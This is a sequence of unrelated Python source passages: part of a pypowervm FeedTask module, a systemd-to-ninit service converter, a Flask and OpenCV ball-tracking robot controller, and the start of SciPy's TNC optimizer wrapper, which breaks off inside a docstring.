# (WrapperTask.wrapper) remain atomic by using simple =/return.
for wrap in self._feed:
if self.get_wrapper(wrap.uuid).etag != wrap.etag:
# Refresh needed
self._feed = [tx.wrapper for tx in
self.wrapper_tasks.values()]
break
return self._feed
@staticmethod
def _process_subtask_rets(subtask_rets):
"""Reshape the dict of wrapper_{uuid} and subtask_rets_{uuid}.
Input form: {'wrapper_%(uuid)s': EntryWrapper,
'subtask_rets_%(uuid)s': {
label1: return_value,
label2: return_value,
...,
labelN: return_value}}
Output form: {uuid: {
'wrapper': EntryWrapper,
label1: return_value,
label2: return_value,
...,
labelN: return_value}}
"""
ret = {}
for key, val in subtask_rets.items():
label, uuid = key.rsplit('_', 1)
if label != 'wrapper':
ret[uuid] = dict(val,
wrapper=subtask_rets['wrapper_%s' % uuid])
return ret
def execute(self):
"""Run this FeedTask's WrapperTasks in parallel TaskFlow engine.
:return: Dictionary of results provided by subtasks and post-execs.
The shape of this dict is as normally expected from TaskFlow,
noting that the WrapperTasks are executed in a subflow and
their results processed into wrapper_task_rets. For example:
{'wrapper_task_rets': { uuid: {...}, uuid: {...}, ...}
'post_exec_x_provides': ...,
'post_exec_y_provides': ...,
...}
"""
# Ensure a true no-op (in particular, we don't want to GET the feed) if
# there are no Subtasks
if not any([self._tx_by_uuid, self._common_tx.subtasks,
self._post_exec]):
LOG.info(_("FeedTask %s has no Subtasks; no-op execution."),
self.name)
return
rets = {'wrapper_task_rets': {}}
try:
# Calling .wrapper_tasks will cause the feed to be fetched and
# WrapperTasks to be replicated, if not already done. Only do this
# if there exists at least one WrapperTask with Subtasks.
# (NB: It is legal to have a FeedTask that *only* has post-execs.)
if self._tx_by_uuid or self._common_tx.subtasks:
pflow = tf_uf.Flow("%s_parallel_flow" % self.name)
pflow.add(*self.wrapper_tasks.values())
# Execute the parallel flow now so the results can be provided
# to any post-execs.
rets['wrapper_task_rets'] = self._process_subtask_rets(
tf_eng.run(
pflow, engine='parallel',
executor=ContextThreadPoolExecutor(self.max_workers)))
if self._post_exec:
flow = tf_lf.Flow('%s_post_execs' % self.name)
flow.add(*self._post_exec)
eng = tf_eng.load(flow, store=rets)
eng.run()
rets = eng.storage.fetch_all()
except tf_ex.WrappedFailure as wfail:
LOG.error(_("FeedTask %s experienced multiple exceptions. They "
"are logged individually below."), self.name)
for fail in wfail:
LOG.exception(fail.pformat(fail.traceback_str))
raise ex.MultipleExceptionsInFeedTask(self.name, wfail)
# Let a non-wrapped exception (which happens if there's only one
# element in the feed) bubble up as-is.
return rets
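# Illustrative sketch (not part of the original module): a post-exec Task
# consuming the 'wrapper_task_rets' value described in add_post_execute.
# 'adapter', 'LPAR', 'add_widget', and 'widget' are assumed names borrowed
# from the docstring examples above.
#
#   class LogRets(tf_task.Task):
#       def __init__(self):
#           super(LogRets, self).__init__('log_rets',
#                                         requires='wrapper_task_rets')
#
#       def execute(self, wrapper_task_rets):
#           for uuid, rets in wrapper_task_rets.items():
#               LOG.info("%s -> %s", uuid, rets.get('widget_count'))
#
#   ftsk = FeedTask('example', LPAR.getter(adapter))
#   ftsk.add_functor_subtask(add_widget, widget, provides='widget_count')
#   ftsk.add_post_execute(LogRets())
#   ftsk.execute()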
|
|
import configparser
import argparse
import glob
import shlex
from os import path
import os
import re
from itertools import chain
from collections import OrderedDict
#for now, we don't want these prefixes
cmd_prefix=re.compile('^[@-]{1,2}')
#Special Dictionary to deal with how systemd unit files are structured
class SystemdODict(OrderedDict):
PILE_ME_UP=('Requires','RequiresOverrideable','Requisite',
'Wants','BindsTo', 'PartOf','Conflicts','Before',
'After','OnFailure','PropagatesReloadTo','ReloadPropagatedFrom',
'JoinsNamespaceOf','Alias','WantedBy','RequiredBy','Also',
'ReadWriteDirectories', 'ReadOnlyDirectories', 'InaccessibleDirectories',
'SupplementaryGroups')
UNNEEDED_DEPS=['network.target','network-online.target','umount.target','basic.target']
def __setitem__(self, key, value):
print(value)
if isinstance(value, list) and key in self:
self[key].extend(value)
else:
if key in self.PILE_ME_UP:
value=shlex.split(' '.join(value) if isinstance(value, list) else value)
#print(key,value)
super(OrderedDict, self).__setitem__(key, value)
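# Illustrative example of the intended behaviour of the dictionary above:
# keys listed in PILE_ME_UP are split on whitespace and accumulate across
# repeated assignments, so repeated 'After=' lines in a unit file pile up.
#
#   d = SystemdODict()
#   d['After'] = ['network.target sshd.service']
#   d['After'] = ['dbus.service']
#   # d['After'] -> ['network.target', 'sshd.service', 'dbus.service']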
def ninit_service(cfg,f):
#we'll need a way to make a service maker based on templates
service_name=path.splitext(path.basename(f))[0]
newf = path.join(path.abspath(args.output),service_name)
if not(path.exists(newf)):
os.makedirs(newf)
#handle anything in in [Unit] first
## Let's create a short README to help preserve documentation
README=['# {}'.format(service_name)]
if 'Description' in cfg['Unit']:
README.extend(cfg['Unit']['Description'])
README.append(' ')
if 'Documentation' in cfg['Unit']:
README.extend(cfg['Unit']['Documentation'])
if len(README) > 1:
readme_file = open(path.join(newf,'README'),'w')
readme_file.write('\n'.join(README))
readme_file.close()
## End README
## Handle dependencies
# handle Hard dependencies first
depends=[]
if 'Requires' in cfg['Unit']:
depends.extend(cfg['Unit']['Requires'])
if 'Wants' in cfg['Unit']:
depends.extend(cfg['Unit']['Wants'])
else:
#it's probably specified in the directories
syswants=os.path.join('/usr/lib/systemd/system',path.basename(f)+'.wants','*')
etcwants=os.path.join('/etc/systemd/system',path.basename(f)+'.wants','*')
depends.extend([path.splitext(path.basename(n))[0] for n in glob.iglob(syswants)])
depends.extend([path.splitext(path.basename(n))[0] for n in glob.iglob(etcwants)])
if 'Requisite' in cfg['Unit']:
depends.extend(cfg['Unit']['Requisite']) #how does ninit handle failing dependencies?
#add some nsvc -g <Requisite> to the setup or run script and prevent it from running if otherwise?
if 'BindsTo' in cfg['Unit']:
depends.extend(cfg['Unit']['BindsTo'])
#be sure to tell the script later to write a special run or end file?
if 'PartOf' in cfg['Unit']:
depends.extend(cfg['Unit']['PartOf'])
if 'Conflicts' in cfg['Unit']:
#check in setup if any of the conflicting services are here
pass
if 'OnFailure' in cfg['Unit']:
#check if our service failed fantastically in end and launch those if we durped
pass
## Check any Conditionals and write those to a special setup file
setup=[]
## Once ExecStartPre things are gathered too
if 'Service' in cfg:
#then in [Service]
sertype=cfg['Service'].get('Type', [''])[0]
if not sertype and 'BusName' not in cfg['Service']:
sertype='simple'
elif not sertype and 'BusName' in cfg['Service']:
sertype='dbus'
if sertype=='dbus':
depends.append('dbus')
elif sertype=='oneshot':
sync_file=open(path.join(newf,'sync'),'w')
sync_file.write('')
sync_file.close()
## We're done collecting dependencies, let's write the depends file
## also, add any mentioned files that aren't part of the conversion
## to be processed later
#print(depends)
if len(depends) > 0:
#separate these into before and after
#now remove anything silly, like network.target
for d in SystemdODict.UNNEEDED_DEPS:
if d in depends: depends.remove(d)
#if they're specified in after, write them to depends
depends_file=open(path.join(newf,'depends'),'w')
depends_file.write('\n'.join([path.splitext(i)[0] for i in depends]))
#if they're specified in before, write them to a special end file
depends_file.close()
## End Handle dependencies
if cfg['Service'].get('PIDFile',[''])[0] != '':
pidfile=open(path.join(newf,'pidfile'),'w')
pidfile.write(cfg['Service']['PIDFile'][0])
pidfile.close()
#support multiple ExecStart in the case of oneshots
cmd=list(filter(('').__ne__, cfg['Service'].get('ExecStart',[''])))
#strip - and @ at the beginning
cmd_length=len(cmd)
#get this out of the way
reload_start=shlex.split(cfg['Service'].get('ExecReload',['/bin/kill'])[0])[0]
does_not_handle_sighup=path.basename(reload_start) != 'kill'
if 'ExecStop' in cfg['Service'] or \
(does_not_handle_sighup and sertype != 'oneshot') or \
(cmd_length == 1 and ';' in cmd[0]) or cmd_length > 1:
import stat
runpath=path.join(newf,'run')
run_file=open(runpath,'w')
run_file.write('#!/bin/sh\n')
if 'ExecStop' in cfg['Service']:
if len(cfg['Service']['ExecStop']) > 1:
run_file.write("trap './stop' SIGTERM\n")
stop_path=path.join(newf,'stop')
stop_file=open(stop_path,'w')
stop_file.write('#!/bin/sh\n')
stop_file.write('\n'.join([cmd_prefix.sub('',c) \
for c in cfg['Service']['ExecStop']]))
stop_file.close()
else:
stopcmd=cmd_prefix.sub('',cfg['Service']['ExecStop'][0])
run_file.write("trap {} SIGTERM\n".format(shlex.quote(stopcmd)))
#if there's an execreload specified in the file, does this imply it DOESN'T
#handle sighup to reload?
if (does_not_handle_sighup and sertype != 'oneshot'):
if len(cfg['Service']['ExecReload']) > 1:
run_file.write("trap './reload' SIGHUP\n")
reload_path=path.join(newf,'reload')
reload_file=open(reload_path,'w')
reload_file.write('#!/bin/sh\n')
reload_file.write('\n'.join([cmd_prefix.sub('',c) \
for c in cfg['Service']['ExecReload']]))
reload_file.close()
else:
reloadcmd=cmd_prefix.sub('',cfg['Service']['ExecReload'][0])
run_file.write("trap {} SIGHUP\n".format(shlex.quote(reloadcmd)))
run_file.write('\n'.join([cmd_prefix.sub('',c) for c in cmd])) #write bindto stuff here?
run_file.close()
st=os.stat(runpath)
os.chmod(runpath,st.st_mode|stat.S_IXUSR|stat.S_IXGRP|stat.S_IXOTH)
elif cmd_length == 1:
cmd_parts=shlex.split(cmd[0])
runpath=path.join(newf,'run')
if path.exists(runpath):
os.remove(runpath)
os.symlink(cmd_prefix.sub('',cmd_parts[0]),runpath)
params=open(path.join(newf,'params'),'w')
params.write('\n'.join(cmd_parts[1:]))
params.close()
if 'ExecStartPre' in cfg['Service']:
setup.extend(cfg['Service']['ExecStartPre'])
end=[]
if 'ExecStartPost' in cfg['Service']:
end.extend(cfg['Service']['ExecStartPost'])
#handle ExecStop and ExecStopPost how? I think by writing that special run file, but idk
if 'EnvironmentFile' in cfg['Service']:
import shutil
shutil.copy(cfg['Service']['EnvironmentFile'][0],path.join(newf,'environ'))
elif 'Environment' in cfg['Service']:
environ=shlex.split(cfg['Service']['Environment'][0])
if 'WorkingDirectory' in cfg['Service']:
environ.append('PWD={}'.format(cfg['Service']['WorkingDirectory'][0]))
environ='\n'.join(environ)
environ_file=open(path.join(newf,'environ'),'w')
environ_file.write(environ)
environ_file.close()
if 'User' in cfg['Service']:
try:
uid=int(cfg['Service']['User'][0])
except ValueError as e:
from pwd import getpwnam
uid=getpwnam(cfg['Service']['User'][0]).pw_uid
if 'Group' in cfg['Service']:
try:
gid=int(cfg['Service']['Group'][0])
except ValueError as e:
from grp import getgrnam
gid=getgrnam(cfg['Service']['Group'][0]).gr_gid
else:
from pwd import getpwuid
gid=getpwuid(uid).pw_gid
more_gids=[]
if 'SupplementaryGroups' in cfg['Service']:
for i in cfg['Service']['SupplementaryGroups']:
try:
ggid=int(i)
except ValueError as e:
from grp import getgrnam
ggid=getgrnam(i).gr_gid
more_gids.append(ggid)
uid_file=open(path.join(newf,'uid'),'w')
uid_file.write("{}:{}{}".format(uid,gid,
":{}".format(":".join(more_gids)) \
if len(more_gids) > 0 else ""))
uid_file.close()
if cfg['Service'].get('Restart',['no'])[0] != 'no':
respawn_file=open(path.join(newf,'respawn'),'w')
respawn_file.write('')
respawn_file.close()
sleep=cfg['Service']['RestartSec'][0] if 'RestartSec' in cfg['Service'] else '1'
#check for time format and change it to just seconds
sleep_file=open(path.join(newf,'sleep'),'w')
sleep_file.write(sleep)
sleep_file.close()
if len(end) > 0:
import stat
endpath=path.join(newf,'end')
end_file=open(endpath,'w')
end_file.write('#!/bin/sh\n')
end_file.write('\n'.join([cmd_prefix.sub('',c) for c in end])) #write bindto stuff here?
end_file.close()
st=os.stat(endpath)
os.chmod(endpath,st.st_mode|stat.S_IXUSR|stat.S_IXGRP|stat.S_IXOTH)
if len(setup) > 0:
import stat
setuppath=path.join(newf,'setup')
setup_file=open(setuppath,'w')
setup_file.write('#!/bin/sh\n')
setup_file.write('\n'.join([cmd_prefix.sub('',c) for c in setup])) #write bindto stuff here?
setup_file.close()
st=os.stat(setuppath)
os.chmod(setuppath,st.st_mode|stat.S_IXUSR|stat.S_IXGRP|stat.S_IXOTH)
elif 'Socket' in cfg:
#we only care about file listen streams
pass
elif 'Mount' in cfg:
#output to args.output/fstab.addons
pass
if 'Automount' in cfg:
#output to args.output/fstab.addons
#treat this as if defaults and type = auto?
pass
elif 'Swap' in cfg:
#output to args.output/fstab.addons
pass
elif 'Path' in cfg:
#write to the args.output/incron.addons
pass
elif 'Timer' in cfg:
#write to the args.output/cron.addons
pass
print(f,"->",newf)
parser = argparse.ArgumentParser(description='Convert systemd files to ninit service directories')
parser.add_argument('--output','-o',type=str,
help="Output the service directory into this folder",default=".")
parser.add_argument('files',metavar='F',type=str,nargs='*',help="Service files to convert")
args = parser.parse_args()
if len(args.files) < 1:
files = chain(glob.iglob('/usr/lib/systemd/system/*.service'),
glob.iglob('/usr/lib/systemd/system/*.socket'))
else:
files=args.files
#/usr/lib/systemd/system/wicd.service
for f in files:
with open(f, 'r') as service_file:
cfg = configparser.RawConfigParser(dict_type=SystemdODict,strict=False)
cfg.read_file(service_file)
ninit_service(cfg,f)
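# Example invocation (illustrative; the script name and paths are placeholders):
#   python systemd2ninit.py -o /etc/ninit /usr/lib/systemd/system/sshd.service
# With no file arguments the script walks /usr/lib/systemd/system/*.service
# and *.socket, as set up above.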
|
|
import cv2
import numpy as np
import signal
import sys
from flask import Flask, render_template, Response, request
from collections import deque
from datetime import datetime
from time import time, sleep
from threading import Thread
try:
from PyMata.pymata import PyMata
class Motors(Thread):
MOTOR_1_PWM = 2
MOTOR_1_A = 3
MOTOR_1_B = 4
MOTOR_2_PWM = 5
MOTOR_2_A = 6
MOTOR_2_B = 7
MOTOR_3_PWM = 8
MOTOR_3_A = 9
MOTOR_3_B = 10
def __init__(self):
Thread.__init__(self)
self.daemon = True
self.board = PyMata()
def signal_handler(sig, frame):
self.stop_motors()
self.board.reset()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
self.board.set_pin_mode(self.MOTOR_1_PWM, self.board.PWM, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_1_A, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_1_B, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_2_PWM, self.board.PWM, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_2_A, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_2_B, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_3_PWM, self.board.PWM, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_3_A, self.board.OUTPUT, self.board.DIGITAL)
self.board.set_pin_mode(self.MOTOR_3_B, self.board.OUTPUT, self.board.DIGITAL)
self.dx, self.dy = 0, 0
def stop_motors(self):
self.board.digital_write(self.MOTOR_1_B, 0)
self.board.digital_write(self.MOTOR_1_A, 0)
self.board.digital_write(self.MOTOR_2_B, 0)
self.board.digital_write(self.MOTOR_2_A, 0)
self.board.digital_write(self.MOTOR_3_B, 0)
self.board.digital_write(self.MOTOR_3_A, 0)
def run(self):
while True:
# Reset all direction pins to avoid damaging H-bridges
# TODO: USE dx,dy now in (-1,1)+(None,None) range
self.stop_motors()
dist = abs(self.dx)
if dist > 0.2: #was 2
if self.dx > 0:
print("Turning left")
self.board.digital_write(self.MOTOR_1_B, 1)
self.board.digital_write(self.MOTOR_2_B, 1)
self.board.digital_write(self.MOTOR_3_B, 1)
else:
print("Turning right")
self.board.digital_write(self.MOTOR_1_A, 1)
self.board.digital_write(self.MOTOR_2_A, 1)
self.board.digital_write(self.MOTOR_3_A, 1)
self.board.analog_write(self.MOTOR_1_PWM, int(dist ** 0.7 + 25))
self.board.analog_write(self.MOTOR_2_PWM, int(dist ** 0.7 + 25))
self.board.analog_write(self.MOTOR_3_PWM, int(dist ** 0.7 + 25))
# elif self.dy > 30:
else:
print("Going forward")
self.board.digital_write(self.MOTOR_1_B, 1)
self.board.digital_write(self.MOTOR_3_A, 1)
self.board.analog_write(self.MOTOR_1_PWM, int(abs(self.dy) ** 0.5) + 30)  # abs() guards against negative dy
self.board.analog_write(self.MOTOR_2_PWM, 0)
self.board.analog_write(self.MOTOR_3_PWM, int(abs(self.dy) ** 0.5) + 30)
sleep(0.03)
except:
class Motors:
def __init__(self):
self.dx, self.dy = 0, 0
def start(self):
print("Wrooom wroom!!!! (no motors found) ")
class FrameGrabber(Thread):
def __init__(self, width=320, height=240):
Thread.__init__(self)
self.daemon = True
self.video = cv2.VideoCapture(0)
self.width,self.height = width,height
self.video.set(3, width)
self.video.set(4, height)
self.timestamp = time()
self.frames = 0
self.fps = 50
self.current_frame = self.video.read()[1]
self.ballLower = (5, 140, 140)
self.ballUpper = (30, 255, 255)
def getFrameSize(self, frame=None):
if frame is None:
return self.width,self.height
width = np.size(frame, 1)
height = np.size(frame, 0)
return width, height
def getBallDelta(self,x,y):
w,h = self.width,self.height
dx,dy = x/w, y/h
dx,dy = (dx-0.5)*2,(dy-0.5)*2
return dx,dy
def run(self):
while True:
self.frames += 1
timestamp_begin = time()
if self.frames > 10:
self.fps = self.frames / (timestamp_begin - self.timestamp)
self.frames = 0
self.timestamp = timestamp_begin
_, frame = self.video.read()
frame = cv2.flip(frame, 1)
original = frame
blurred = cv2.blur(frame, (4,4))
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, self.ballLower, self.ballUpper)
mask = cv2.dilate(mask, None, iterations=2)
cutout = cv2.bitwise_and(frame,frame, mask= mask)
cnts = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if cnts:
c = max(cnts, key=cv2.contourArea)
(x, y), radius = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
if radius > 5:
cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
radius = round( (1/radius)*1135, 2)
cv2.putText(original,str(radius),(int(x),int(y)), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(255,255,255),1,cv2.LINE_AA)
cv2.putText(original,str(radius),(int(x+3),int(y)), cv2.FONT_HERSHEY_SIMPLEX, 0.59,(0,0,0),1,cv2.LINE_AA)
motors.dx, motors.dy = self.getBallDelta(x,y)
cv2.putText(frame,"%.01f fps" % self.fps, (10,20), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(255,255,255),1,cv2.LINE_AA)
width, height = self.getFrameSize(frame=frame)
cv2.putText(frame,str([round(motors.dx,2), round(motors.dy,2)]), (int(width*0.007),int(height*0.97)), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(255,255,255),1,cv2.LINE_AA)
self.current_frame = np.hstack([original, cutout])
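# Worked example of getBallDelta (illustrative): for the default 320x240
# frame, a ball detected at pixel (240, 120) maps to
#   dx = (240/320 - 0.5) * 2 = 0.5   (right of centre)
#   dy = (120/240 - 0.5) * 2 = 0.0   (vertically centred)
# which is the (-1, 1) range the Motors thread expects.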
motors = Motors()
grabber = FrameGrabber()
motors.start()
grabber.start()
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/nouislider.css')
def nouisliderCSS():
return render_template('nouislider.css')
@app.route('/nouislider.js')
def nouisliderJS():
return render_template('nouislider.js')
@app.route('/sliders')
def sliders():
return render_template('sliders.html')
@app.route('/video_feed')
def video_feed():
def generator():
while True:
if grabber.current_frame is not None:
ret, jpeg = cv2.imencode('.jpg', grabber.current_frame, (cv2.IMWRITE_JPEG_QUALITY, 10))
yield b'--frame\r\nContent-Type: image/jpeg\r\n\r\n' + jpeg.tobytes() + b'\r\n\r\n'
sleep(0.002)
return Response(generator(),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/camera/config', methods=['get', 'post'])
def config():
global grabber
blH = int(request.form.get('blH')) #int cant be none
blS = int(request.form.get('blS'))
blV = int(request.form.get('blV'))
bhH = int(request.form.get('bhH'))
bhS = int(request.form.get('bhS'))
bhV = int(request.form.get('bhV'))
print ("lower range is now: " , grabber.ballLower , (blH, blS, blV))
grabber.ballLower = (blH, blS, blV)
print("Higher range is now: " ,grabber.ballUpper, (bhH, bhS, bhV))
grabber.ballUpper = (bhH, bhS, bhV)
return "OK"
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True,use_reloader=False,threaded=True)
|
|
# TNC Python interface
# @(#) $Jeannot: tnc.py,v 1.11 2005/01/28 18:27:31 js Exp $
# Copyright (c) 2004-2005, Jean-Sebastien Roy ([email protected])
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
TNC: A python interface to the TNC non-linear optimizer
TNC is a non-linear optimizer. To use it, you must provide a function to
minimize. The function must take one argument: the list of coordinates where to
evaluate the function; and it must return either a tuple, whose first element is the
value of the function, and whose second argument is the gradient of the function
(as a list of values); or None, to abort the minimization.
"""
from __future__ import division, print_function, absolute_import
from numpy import inf, array, zeros, asfarray
from scipy.optimize import moduleTNC, approx_fprime
from .optimize import MemoizeJac, OptimizeResult, _check_unknown_options
__all__ = ['fmin_tnc']
MSG_NONE = 0 # No messages
MSG_ITER = 1 # One line per iteration
MSG_INFO = 2 # Informational messages
MSG_VERS = 4 # Version info
MSG_EXIT = 8 # Exit reasons
MSG_ALL = MSG_ITER + MSG_INFO + MSG_VERS + MSG_EXIT
MSGS = {
MSG_NONE: "No messages",
MSG_ITER: "One line per iteration",
MSG_INFO: "Informational messages",
MSG_VERS: "Version info",
MSG_EXIT: "Exit reasons",
MSG_ALL: "All messages"
}
INFEASIBLE = -1 # Infeasible (lower bound > upper bound)
LOCALMINIMUM = 0 # Local minimum reached (|pg| ~= 0)
FCONVERGED = 1 # Converged (|f_n-f_(n-1)| ~= 0)
XCONVERGED = 2 # Converged (|x_n-x_(n-1)| ~= 0)
MAXFUN = 3 # Max. number of function evaluations reached
LSFAIL = 4 # Linear search failed
CONSTANT = 5 # All lower bounds are equal to the upper bounds
NOPROGRESS = 6 # Unable to progress
USERABORT = 7 # User requested end of minimization
RCSTRINGS = {
INFEASIBLE: "Infeasible (lower bound > upper bound)",
LOCALMINIMUM: "Local minimum reached (|pg| ~= 0)",
FCONVERGED: "Converged (|f_n-f_(n-1)| ~= 0)",
XCONVERGED: "Converged (|x_n-x_(n-1)| ~= 0)",
MAXFUN: "Max. number of function evaluations reached",
LSFAIL: "Linear search failed",
CONSTANT: "All lower bounds are equal to the upper bounds",
NOPROGRESS: "Unable to progress",
USERABORT: "User requested end of minimization"
}
# Changes to interface made by Travis Oliphant, Apr. 2004 for inclusion in
# SciPy
def fmin_tnc(func, x0, fprime=None, args=(), approx_grad=0,
bounds=None, epsilon=1e-8, scale=None, offset=None,
messages=MSG_ALL, maxCGit=-1, maxfun=None, eta=-1,
stepmx=0, accuracy=0, fmin=0, ftol=-1, xtol=-1, pgtol=-1,
rescale=-1, disp=None, callback=None):
"""
Minimize a function with variables subject to bounds, using
gradient information in a truncated Newton algorithm. This
method wraps a C implementation of the algorithm.
Parameters
----------
func : callable ``func(x, *args)``
Function to minimize. Must do one of:
1. Return f and g, where f is the value of the function and g its
gradient (a list of floats).
2. Return the function value but supply gradient function
separately as `fprime`.
3. Return the function value and set ``approx_grad=True``.
If the function returns None, the minimization
is aborted.
x0 : array_like
Initial estimate of minimum.
fprime : callable ``fprime(x, *args)``, optional
Gradient of `func`. If None, then either `func` must return the
function value and the gradient (``f,g = func(x, *args)``)
or `approx_grad` must be True.
args : tuple, optional
Arguments to pass to function.
approx_grad : bool, optional
If true, approximate the gradient numerically.
bounds : list, optional
(min, max) pairs for each element in x0, defining the
bounds on that parameter. Use None or +/-inf for one of
min or max when there is no bound in that direction.
epsilon : float, optional
Used if approx_grad is True. The stepsize in a finite
difference approximation for fprime.
scale : array_like, optional
Scaling factors to apply to each variable. If None, the
factors are up-low for interval bounded variables and
1+|x| for the others. Defaults to None.
offset : array_like, optional
Value to subtract from each variable. If None, the
offsets are (up+low)/2 for interval bounded variables
and x for the others.
messages : int, optional
Bit mask used to select which messages to display during
minimization; values are defined in the MSGS dict. Defaults to
MSG_ALL.
disp : int, optional
Integer interface to messages. 0 = no message, 5 = all messages
maxCGit : int, optional
Maximum number of hessian*vector evaluations per main
iteration. If maxCGit == 0, the direction chosen is
-gradient. If maxCGit < 0, maxCGit is set to
max(1,min(50,n/2)). Defaults to -1.
maxfun : int, optional
Maximum number of function evaluations. If None, maxfun is
set to max(100, 10*len(x0)). Defaults to None.
eta : float, optional
Severity of the line search. If < 0 or > 1, set to 0.25.
Defaults to -1.
stepmx : float, optional
Maximum step for the line search. May be increased during
call. If too small, it will be set to 10.0. Defaults to 0.
accuracy : float, optional
Relative precision for finite difference calculations. If
<= machine_precision, set to sqrt(machine_precision).
Defaults to 0.
fmin : float, optional
Minimum function value estimate. Defaults to 0.
ftol : float, optional
Precision goal for the value of f in the stopping criterion.
If ftol < 0.0, ftol is set to 0.0. Defaults to -1.
xtol : float, optional
Precision goal for the value of x in the stopping
criterion (after applying x scaling factors). If xtol <
0.0, xtol is set to sqrt(machine_precision). Defaults to
-1.
pgtol : float, optional
Precision goal for the value of the projected gradient in
the stopping criterion (after applying x scaling factors).
If pgtol < 0.0, pgtol is set to 1e-2 * sqrt(accuracy).
Setting it to 0.0 is not recommended. Defaults to -1.
rescale : float, optional
Scaling factor (in log10) used to trigger f value
rescaling. If 0, rescale at each iteration. If a large
value, never rescale. If < 0, rescale is set to 1.3.
callback : callable, optional
Called after each iteration, as callback(xk), where xk is the
current parameter vector.
Returns
-------
x : ndarray
The solution.
nfeval : int
The number of function evaluations.
rc : int
Return code, see below
See also
--------
minimize: Interface to minimization algorithms for multivariate
functions. See the 'TNC' `method` in particular.
Notes
-----
The underlying algorithm is truncated Newton, also called
Newton Conjugate-Gradient. This method differs from
scipy.optimize.fmin_ncg in that
1. It wraps a C implementation of the algorithm
2. It allows each variable to be given an upper and lower bound.
    The algorithm incorporates the bound constraints by determining
the descent direction as in an unconstrained truncated Newton,
but never taking a step-size large enough to leave the space
of feasible x's. The algorithm keeps track of a set of
currently active constraints, and ignores them when computing
the minimum allowable step size. (The x's associated with the
active constraint are kept fixed.) If the maximum allowable
step size is zero then a new constraint is added. At the end
of each iteration one of the constraints may be deemed no
longer active and removed. A constraint is considered
    no longer active if it is currently active
but the gradient for that variable points inward from the
constraint. The specific constraint removed is the one
associated with the variable of largest index whose
constraint is no longer active.
    Return codes are defined as follows::
-1 : Infeasible (lower bound > upper bound)
0 : Local minimum reached (|pg| ~= 0)
1 : Converged (|f_n-f_(n-1)| ~= 0)
2 : Converged (|x_n-x_(n-1)| ~= 0)
3 : Max. number of function evaluations reached
4 : Linear search failed
5 : All lower bounds are equal to the upper bounds
6 : Unable to progress
7 : User requested end of minimization
References
----------
Wright S., Nocedal J. (2006), 'Numerical Optimization'
Nash S.G. (1984), "Newton-Type Minimization Via the Lanczos Method",
SIAM Journal of Numerical Analysis 21, pp. 770-778
"""
# handle fprime/approx_grad
if approx_grad:
fun = func
jac = None
elif fprime is None:
fun = MemoizeJac(func)
jac = fun.derivative
else:
fun = func
jac = fprime
if disp is not None: # disp takes precedence over messages
mesg_num = disp
else:
mesg_num = {0: MSG_NONE, 1: MSG_ITER, 2: MSG_INFO, 3: MSG_VERS,
4: MSG_EXIT, 5: MSG_ALL}.get(messages, MSG_ALL)
# build options
opts = {'eps': epsilon,
'scale': scale,
'offset': offset,
'mesg_num': mesg_num,
'maxCGit': maxCGit,
'maxiter': maxfun,
'eta': eta,
'stepmx': stepmx,
'accuracy': accuracy,
'minfev': fmin,
'ftol': ftol,
'xtol': xtol,
'gtol': pgtol,
'rescale': rescale,
'disp': False}
res = _minimize_tnc(fun, x0, args, jac, bounds, callback=callback, **opts)
return res['x'], res['nfev'], res['status']
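# Hedged usage sketch (not part of the original module): the same kind of
# bound-constrained minimization can be expressed through the generic
# ``scipy.optimize.minimize`` interface with ``method='TNC'``.  The objective
# below and all numeric values are made-up illustrations; the option names
# mirror the ``_minimize_tnc`` keywords documented further down.
def _example_minimize_tnc_interface():
    from scipy.optimize import minimize
    def bowl(x):
        # simple smooth objective with its minimum at (1, -2); the gradient is
        # left to TNC's built-in finite-difference approximation
        return (x[0] - 1.0) ** 2 + (x[1] + 2.0) ** 2
    res = minimize(bowl, x0=[0.0, 0.0], method='TNC',
                   bounds=[(-5, 5), (-5, 5)],
                   options={'maxiter': 200, 'ftol': 1e-8, 'disp': False})
    return res.x, res.status, res.message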
def _minimize_tnc(fun, x0, args=(), jac=None, bounds=None,
eps=1e-8, scale=None, offset=None, mesg_num=None,
maxCGit=-1, maxiter=None, eta=-1, stepmx=0, accuracy=0,
minfev=0, ftol=-1, xtol=-1, gtol=-1, rescale=-1, disp=False,
callback=None, **unknown_options):
"""
Minimize a scalar function of one or more variables using a truncated
